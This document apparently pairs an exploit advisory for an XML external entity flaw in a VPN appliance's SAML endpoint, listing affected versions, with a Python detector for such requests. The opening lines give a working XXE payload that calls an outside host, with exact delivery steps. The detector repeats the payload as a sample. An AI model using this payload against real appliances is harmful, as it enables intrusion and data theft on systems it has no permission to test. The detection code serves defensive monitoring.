Affected versions: 6.3.1, 6.4.0 (tested), 6.4.1, and 6.3.4.
Payload (Base64-encode it before sending):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>
Send it to /dana-na/auth/saml-sso.cgi in the SAMLRequest parameter.
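A detection-side check for the request described above, as an added example that is not part of the original page: it decodes the SAMLRequest parameter sent to /dana-na/auth/saml-sso.cgi and flags any DTD, which a schema-defined SAML message does not need. The function names, finding strings and sample bodies are constructed for illustration, and the raw-DEFLATE fallback assumes the SAML redirect binding may also reach the endpoint.

```python
import base64
import binascii
import re
import zlib
from urllib.parse import parse_qs, urlencode

SAML_PATH = "/dana-na/auth/saml-sso.cgi"  # endpoint named on this page
DTD = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.I)
EXTERNAL = re.compile(rb"\b(SYSTEM|PUBLIC)\s+[\"']", re.I)
MAX_INFLATE = 1 << 20  # cap inflated size so a compressed bomb cannot exhaust memory


def decode_candidates(value):
    """Return the byte strings a parser might see: Base64-decoded, plus inflated."""
    value = value.replace(" ", "+")  # an unescaped '+' in a form body arrives as a space
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return []
    docs = [raw]
    try:  # the SAML redirect binding applies raw DEFLATE before Base64
        docs.append(zlib.decompressobj(-15).decompress(raw, MAX_INFLATE))
    except zlib.error:
        pass
    return docs


def inspect_request(path, body):
    """Return a list of findings for one form-encoded request body."""
    if path.split("?", 1)[0] != SAML_PATH:
        return []
    findings = []
    for value in parse_qs(body).get("SAMLRequest", []):
        docs = decode_candidates(value)
        if not docs:
            findings.append("SAMLRequest is not valid Base64")
        elif any(DTD.search(d) for d in docs):
            findings.append("DTD declaration in SAMLRequest")
            if any(EXTERNAL.search(d) for d in docs):
                findings.append("external entity reference (SYSTEM/PUBLIC)")
    return findings


def _body(xml):  # helper for the constructed samples below
    return urlencode({"SAMLRequest": base64.b64encode(xml).decode()})

# Constructed samples: the page's payload with a placeholder host, and a DTD-free message.
SUSPICIOUS = _body(b'<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM '
                   b'"http://placeholder.invalid/x"> %xxe;]><r></r>')
CLEAN = _body(b'<?xml version="1.0"?><samlp:AuthnRequest ID="_constructed" '
              b'xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"/>')
```

Run `inspect_request` over request bodies captured at a reverse proxy or WAF in front of the appliance; a non-empty result on this endpoint is worth an alert.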